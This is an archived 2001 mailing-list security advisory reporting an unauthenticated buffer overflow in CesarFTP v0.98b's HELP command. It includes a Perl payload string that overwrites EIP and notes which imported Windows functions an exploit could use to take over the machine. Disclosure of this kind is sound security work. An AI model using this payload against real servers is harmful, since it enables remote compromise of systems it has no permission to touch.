DESCRIPTION CesarFTP v0.98b is vulnerable to a buffer overflow when sending the HELP command followed by a very long string of characters. Example : Sending the following perl string : "HELP " . ("A" x 1978) . "CCCC\x00\x0D\x0A" Happily reroutes the SERVER.EXE EIP to 43434343 ("CCCC"). This way, anyone can easily compromise the win9x/NT/2k system, without the need to be logged in. The only tricky part in writing the exploit is that SERVER.EXE doesn't have LoadLibraryA & GetProcAddress in it's import table, but there are enough other functions that give away enough power to take over the computer (registry functions, CreateDirectoryA, CreateFileA, ReadFile, WriteFile, ShellExecuteA, ...) I have not written an exploit and probably I never will :) VENDOR STATUS I have sent this advisory to <cesarftpat_private> greetz, [ByteRage] <byterageat_private> byterage.cjb.net __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail http://personal.mail.yahoo.com/
This archive was generated by hypermail 2b30 : Sun Jul 01 2001 - 23:04:39 PDT